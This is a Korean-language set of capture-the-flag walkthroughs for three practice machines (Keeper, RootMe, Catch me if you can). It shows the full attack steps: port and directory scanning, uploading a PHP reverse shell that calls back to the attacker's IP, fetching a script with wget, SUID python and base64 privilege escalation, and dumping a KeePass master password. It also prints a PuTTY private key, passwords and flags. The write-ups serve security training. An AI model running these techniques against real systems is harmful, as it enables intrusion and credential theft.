# 'lnorgaard', 'root' 계정이 있는데 'lnorgaard'은 'Welcome2023!' 패스워드 알 수 있음.

==========================================================================================
|                                   3. guest 계정 접속                                   | 
==========================================================================================
# 'lnorgaard'계정으로 공격대상에 접속
┌──(kali㉿kali)-[~/keeper]
└─$ ssh lnorgaard@10.10.11.227 


# user.txt 플래그 찾을 수 있음
lnorgaard@keeper:~$ ls -alh
--------------------------------------------------------------
-rw-r----- 1 root      lnorgaard   33 Feb  7 11:22 user.txt
-rw-r--r-- 1 root      root       84M Feb  7 14:58 RT30000.zip
--------------------------------------------------------------

lnorgaard@keeper:~$ cat user.txt
---------------------------------
dfd647a85990780c39e000c082cd728a
---------------------------------

===========================================================================================
|                                   4. RT30000.zip 분석                                   | 
===========================================================================================
# 무려 84MB 사이즈의 RT30000.zip 파일이 눈에 뜀
--------------------------------------------------------------
-rw-r--r-- 1 root      root       84M Feb  7 14:58 RT30000.zip
--------------------------------------------------------------


# 공격대상(lnorgaard@10.10.11.227)에서 공격자(kali)로 RT30000.zip 파일 가져오기(원격에서는 도구 사용하기 힘듬)
# scp는 용량이 커서 그런가 32%에서 멈춤
┌──(kali㉿kali)-[~/keeper]                                                                    
└─$ rsync -avz -e ssh lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip . 


┌──(kali㉿kali)-[~/keeper]                                                                    
└─$ unzip RT30000.zip
---------------------------------                                                                         
Archive:  RT30000.zip                                                                         
  inflating: KeePassDumpFull.dmp                                                                                          
  extracting: passcodes.kdbx 
---------------------------------

=====================================================================================================
|                                   4-1. KeePassDumpFull.dmp 분석                                   | 
=====================================================================================================
# 'passcodes.kdbx' 열기 위해서 'keepassxc' 설치
# Application => keepassxc 실행 => 상단에 Database => Open Database => 'passcodes.kdbx'
# 그런데!! 패스워드가 필요함
┌──(kali㉿kali)-[~/keeper]
└─$ sudo apt-get install keepassxc


# KeePassDumpFull.dmp에서 'passcodes.kdbx'패스워드를 추출할꺼임
# KeePass Master Password Dumper는 KeePass의 메모리에서 마스터 비밀번호를 추출하기 위한 간단한 증명 개념 도구
┌──(kali㉿kali)-[~/keeper]                                                                    
└─$ wgetwget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb 


┌──(kali㉿kali)-[~/keeper]                                                                    
└─$ wgetsudo dpkg -i packages-microsoft-prod.deb


┌──(kali㉿kali)-[~/keeper]                                                                    
└─$ wgetsudo apt-get install -y apt-transport-https


┌──(kali㉿kali)-[~/keeper]                                                                    
└─$ wgetsudo apt-get install -y dotnet-sdk-7.0 


┌──(kali㉿kali)-[~/keeper]
└─$ dotnet --version


┌──(kali㉿kali)-[~/keeper]
└─$ git clone https://github.com/vdohney/keepass-password-dumper 


┌──(kali㉿kali)-[~/keeper]
└─$ cd keepass-password-dumper


┌──(kali㉿kali)-[~/keeper/keepass-password-dumper]
└─$ dotnet run KeePassDumpFull.dmp
-------------------------------------------------------------------------------
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
-------------------------------------------------------------------------------


# 'M}dgrød med fløde' 구글링 하니까 'rødgrød med fløde'로 변경되고 덴마크의 디저트랍니다.
--------------------------------------------------------
Google : 'M}dgrød med fløde' => 'rødgrød med fløde'
--------------------------------------------------------

===================================================================================================================
|                                   4-2. passcodes.kdbx 로그인 및 root 계정 접속                                  | 
===================================================================================================================
# 다시, Application => keepassxc 실행 => 상단에 Database => Open Database => 'passcodes.kdbx'
# 패스워드 'rødgrød med fløde'입력
# 왼쪽 메뉴에 Network 클릭하고 root 클릭하면 'root'의 'F4><3K0nd!' 패스워드 확인가능
# ssh 접속하는데 안됨
┌──(kali㉿kali)-[~/keeper]
└─$ ssh root@10.10.11.227
------------------------------------
root@10.10.11.227's password:                                                                 
Permission denied, please try again. 
------------------------------------


# Notes 확인해보자.
# 해당 Notes는 Putty에서 사용하는 키(.PPK)임. 
# 그래서 openssh에서 지원하는 형식의 개인키로 변경해줘야 됨. 
------------------------------------------------------------------------------
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
------------------------------------------------------------------------------


# Notes을 'putty_private_key.ppk'에 복사 붙여넣기 해줌
┌──(kali㉿kali)-[~/keeper]
└─$ sudo mousepad putty_private_key.ppk


# 'putty_private_key.ppk'을 'private-openssh' 형식의 'openssh_private_key' 이름으로 변경해줌
┌──(kali㉿kali)-[~/keeper]
└─$ puttygen putty_private_key.ppk -O private-openssh -o openssh_private_key


# 'openssh_private_key'로 root@10.10.11.227 접속
┌──(kali㉿kali)-[~/keeper]
└─$ ssh -i openssh_private_key root@10.10.11.227

 
root@keeper:~# id
--------------------------------------
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------


root@keeper:~# ls -alh
--------------------------------------------------
-rw-r-----  1 root root   33 Feb  8 07:26 root.txt
--------------------------------------------------


root@keeper:~# cat root.txt
---------------------------------
0d232ade59997522256769bc91656bfc
---------------------------------

[redraccoon] ## rootme ##

Kwon Oh! JUN — Wed, 7 Feb 2024 16:29:06 +0900

TryHackMe | 모의해킹 기초

레드라쿤 모의해킹 기초 실습방

tryhackme.com

[rootme]

sudo nmap -sV 10.10.226.25 -T4
---------------------------------------------------------------------------------                                                          
[sudo] password for kali:                                                                     
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-06 23:55 EST                               
Nmap scan report for 10.10.226.25                                                             
Host is up (0.47s latency).                                                                   
Not shown: 998 closed tcp ports (reset)                                                       
PORT   STATE SERVICE VERSION                                                                  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)             
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                                           
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                       
                                                                                              
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.05 seconds 
---------------------------------------------------------------------------------


sudo nmap -A 10.10.226.25 -T5 -p 22,80
---------------------------------------------------------------------------------                                                 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 00:07 EST
Nmap scan report for 10.10.226.25
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
|   256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_  256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 clos
ed port                
Aggressive OS guesses: Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linu
x 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Lin
ux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   152.60 ms 10.4.0.1
2   ... 3
4   407.76 ms 10.10.226.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/su
bmit/ .                
Nmap done: 1 IP address (1 host up) scanned in 46.14 seconds
---------------------------------------------------------------------------------


# 'http://10.10.226.25/' 사이트 대상으로 /usr/share/wordlists/dirb/common.txt의 wordlist 사용해서 디렉터리 브루트 포싱하기 
gobuster dir -u http://10.10.226.25/ -w /usr/share/wordlists/dirb/common.txt -f -x php -t 100                                                                                           
=============================================================== 
Gobuster v3.6                                                                        [174/277]
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                                 
===============================================================                               
[+] Url:                     http://10.10.226.25/                                             
[+] Method:                  GET                                                              
[+] Threads:                 100                                                              
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt                             
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php/                (Status: 403) [Size: 277]
/.htpasswd/           (Status: 403) [Size: 277]
/.htpasswd.php/       (Status: 403) [Size: 277]
/.htaccess/           (Status: 403) [Size: 277]
/.hta/                (Status: 403) [Size: 277]
/.hta.php/            (Status: 403) [Size: 277]
/.htaccess.php/       (Status: 403) [Size: 277]
Progress: 2171 / 9230 (23.52%)[ERROR] Get "http://10.10.226.25/activeCollab/": context deadlin
e exceeded (Client.Timeout exceeded while awaiting headers)
/css/                 (Status: 200) [Size: 1125]
/icons/               (Status: 403) [Size: 277]
/index.php/           (Status: 200) [Size: 616]
/index.php/           (Status: 200) [Size: 616]
/js/                  (Status: 200) [Size: 958]
/panel/               (Status: 200) [Size: 732]
/server-status/       (Status: 403) [Size: 277]
Progress: 7867 / 9230 (85.23%)[ERROR] Get "http://10.10.226.25/press_releases/": context deadl
ine exceeded (Client.Timeout exceeded while awaiting headers)
/uploads/             (Status: 200) [Size: 743]
Progress: 9228 / 9230 (99.98%)[ERROR] Get "http://10.10.226.25/Super-Admin/": context deadline
 exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================


# 파일 업로드 기능 페이지
http://10.10.226.25/panel/


# 파일 업로드 확인 페이지
http://10.10.226.25/uploads/
--------------------------------------------------------
Index of /uploads
======================================================
	Name	Last modified	Size	Description
======================================================
Parent Directory	 	- 	 
php-reverse-shell.php5	2024-02-07 05:43 	5.4K	 
======================================================
Apache/2.4.29 (Ubuntu) Server at 10.10.226.25 Port 80
--------------------------------------------------------

# .php reverse shell 파일 찾기
find / -name "*php-reverse-shell*" 2>/dev/null
--------------------------------------------------------------
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
--------------------------------------------------------------


sudo mousepad php-reverse-shell.php 
----------------------------------------
$VERSION = "1.0";
$ip = '10.4.61.73';  // 본인 VPN IP
$port = 1234;       // 상관없음
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
----------------------------------------

# 해당 웹 페이지에서 'php-reverse-shell.php'업로드하기
http://10.10.226.25/panel/


# 업로드가 안됨.
# php => php5로 확장자 변경하고 다시 업로드
cp php-reverse-shell.php php-reverse-shell.php5


# 공격대상에서 리버스 받을 포트 열어놓기
nc -lvnp 1234
-----------------------------                                                                        
listening on [any] 1234 ...
-----------------------------


# 헤당 웹 페이지에서 'php-reverse-shell.php5'실행
http://10.10.226.25/uploads/
-----------------------------------------------------------------------------------------------
listening on [any] 1234 ...                                                                   
connect to [10.4.61.73] from (UNKNOWN) [10.10.226.25] 36320                                   
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_
64 GNU/Linux                                                                                  
 05:47:49 up 54 min,  0 users,  load average: 0.00, 0.00, 0.01                                
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                           
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                         
/bin/sh: 0: can't access tty; job control turned off  
-----------------------------------------------------------------------------------------------

# Python 스크립트를 사용하여 새로운 bash 쉘 세션을 생성하는 명령어
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
-------------------
www-data@rootme:/$ 
-------------------


# 'LinEnum.sh' 코드를 kali로 가져옴
# 'LinEnum.sh': 리눅스 시스템에서 정보 수집과 취약점 탐색을 도와주는 스크립트
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh


# 'kali'에서 웹 8443포트 열음(공격대상에서 직접 못 받아와서 'kali'을 통해 'LinEnum.sh' 받으려고)
python3 -m http.server 8443


# /dev/shm : 휘발성 디렉토리로 재부팅하면 삭제됨, 보안 취약점을 이용한 공격에서 임시 파일을 저장하는 공간으로 사용
www-data@rootme:/$ cd /dev/shm 


# 'kali'에서 LinEnum.sh 가져옴
www-data@rootme:/dev/shm$ wget http://10.4.61.73:8443/LinEnum.sh


# 실행 권한 부여
www-data@rootme:/dev/shm$ chmod +x ./LinEnum.sh


# LinEnum.sh 실행
# /usr/bin/python 파일은 SUID가 설정됨.
www-data@rootme:/dev/shm$ ./LinEnum.sh
------------------------------------------------------------
[+] Possibly interesting SUID files:
-rwsr-sr-x 1 root root 3665768 Aug  4  2020 /usr/bin/python
------------------------------------------------------------


# Python 스크립트를 사용하여 새로운 쉘 세션을 생성하고, 이 쉘 세션에서는 부모 프로세스의 권한을 상속
# 결과를 분석해 보면, www-data 사용자로 로그인되어 있지만, 유효 사용자 ID와 유효 그룹 ID는 root(0)로, root 권한을 얻었음을 보여줌. 이는 일반적으로 시스템에서 보안 취약점을 이용하여 권한 상승(privilege escalation)을 수행했음을 의미
# 참고 : https://gtfobins.github.io/gtfobins/python/#suid
www-data@rootme:/$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
---------------------------------------------------------------------------------------
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
---------------------------------------------------------------------------------------


# find / -name "user.txt" 2>/dev/null
------------------------------------
find / -name "user.txt" 2>/dev/null
/var/www/user.txt
------------------------------------


# cat /var/www/user.txt
-----------------------
cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}
-----------------------


# find / -name "root.txt" 2>/dev/null
------------------------------------
find / -name "root.txt" 2>/dev/null
/root/root.txt
------------------------------------


# cat /root/root.txt
--------------------------
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
--------------------------

[redraccoon] ## Catch me if you can ##

Kwon Oh! JUN — Tue, 6 Feb 2024 23:43:43 +0900

TryHackMe | 모의해킹 기초

레드라쿤 모의해킹 기초 실습방

tryhackme.com

[Cath Me If You Can]

sudo nmap 10.10.247.147 -sS -T4
----------------------
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
----------------------


sudo nmap 10.10.247.147 -sV -T4 -sC -p 21,22,80
----------------------------------------------------------------------------------
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.61.73
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 1000     1000            0 Mar 12  2023 hiya
|_-rw-r--r--    1 0        0              45 Mar 12  2023 temporary_pw.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 128a28dd913a41fdaf6f3a3c4c43ea5c (RSA)
|   256 ab36d4c2a3438887d0892ebbb2ce0351 (ECDSA)
|_  256 3ae52103c4deb9531ac6a966cbea1f1b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/dev/
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
----------------------------------------------------------------------------------


ftp 10.10.247.147
-------------------
id : anonymous
pw : anonymous
-------------------


ftp > ls -alh
-------------------------------------------------------------------------
drwxrwxr-x    2 1000     1000         4096 Mar 12  2023 .
drwxrwxr-x    2 1000     1000         4096 Mar 12  2023 ..
-rwxrw-r--    1 1000     1000         7173 Mar 12  2023 .ssh_creds.docx
-rw-rw-r--    1 1000     1000            0 Mar 12  2023 hiya
-rw-r--r--    1 0        0              45 Mar 12  2023 temporary_pw.txt
-------------------------------------------------------------------------


# FTP로 연결한 '10.10.247.147'에서 다음 파일을 'kali'로 다운받음
ftp> get .ssh_creds.docx
ftp> get .temporary_pw.txt


# 'kali'에서 확인 
ls -a
----------------------------------------
temporary_pw.txt	.ssh_creds.docx
----------------------------------------


cat temporary_pw.txt
-------------------------------------------- 
Do you see a docx file ? Read the docx file.
--------------------------------------------


# .ssh_creds.docx 읽기(시연영상에서는 이렇게 하는데 전 안됨...)
libreoffice --cat .ssh_creds.docx


# .ssh_creds.docx => output.txt로 파일 변환
pandoc .ssh_creds.docx -t plain -o output.txt


# output.txt 실행
cat output.txt
-------------------------------------------------------------------------
Hey, I created this document for you so you know my name right? That’s
my ssh id.

Encoded password just in case Y2F0Y2htZSFAIw==
-------------------------------------------------------------------------


# 'Y2F0Y2htZSFAIw=='을 base64 디코딩
echo 'Y2F0Y2htZSFAIw==' | base64 -d
-----------
catchme!@#
-----------


# exiftool : 미디어 파일의 메타데이터를 읽을 수 있음
exiftool .ssh_creds.docx   
-------------------------------------------------------------------        
ExifTool Version Number         : 12.57
File Name                       : .ssh_creds.docx
Directory                       : .
File Size                       : 7.2 kB
File Modification Date/Time     : 2023:03:11 21:31:40-05:00
File Access Date/Time           : 2024:02:06 04:02:07-05:00
File Inode Change Date/Time     : 2024:02:06 03:36:16-05:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0808
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x7f431349
Zip Compressed Size             : 360
Zip Uncompressed Size           : 1341
Zip File Name                   : word/numbering.xml
Creator                         : harry
-------------------------------------------------------------------


# 공격 대상 서버로 ssh 접속
ssh harry@10.10.247.147
----------------------
password : catchme!@#
----------------------


sudo find / -name "user.txt" 2>/dev/null
-----------------------------------
/home/harry/backup/user7/user.txt
/home/harry/backup/user16/user.txt
/home/harry/backup/user/user.txt
-----------------------------------


cat /home/harry/backup/user7/user.txt
----------------------
GROOT{C4TCHME_S3CRETS}
----------------------


sudo find / -name "flag.txt" 2>/dev/null
---------------
/root/flag.txt
---------------


# flat.txt 파일은 접근 권한이 없음
cat /root/flag.txt
--------------------------------------
cat: /root/flag.txt: Permission denied
--------------------------------------


# -type f : 일반 파일
# -perm -4000 : 'setuid' 권한이 설정된 파일
find / -type f -perm -4000 -exec ls -h {} \; 2>/dev/null
----------------
/usr/bin/base64
----------------


# SUID 권한이기 때문에 base64 명령어를 사용하면 해당 명령어의 소유자 권한으로 실행하게 됨.
base64 /root/flag.txt
----------------------------------------------------
UjFKUFQxUjdRelIwUTJ3cmJFMUZJV1o1TUZWak5FNTlDZz09Cg==
----------------------------------------------------


# base65 디코딩
echo "UjFKUFQxUjdRelIwUTJ3cmJFMUZJV1o1TUZWak5FNTlDZz09Cg==" | base64 -d
------------------------------------
R1JPT1R7QzR0Q2wrbE1FIWZ5MFVjNE59Cg==
------------------------------------


# base65 디코딩 한번 더 
echo "R1JPT1R7QzR0Q2wrbE1FIWZ5MFVjNE59Cg==" | base64 -d
------------------------
GROOT{C4tCl+lME!fy0Uc4N}
------------------------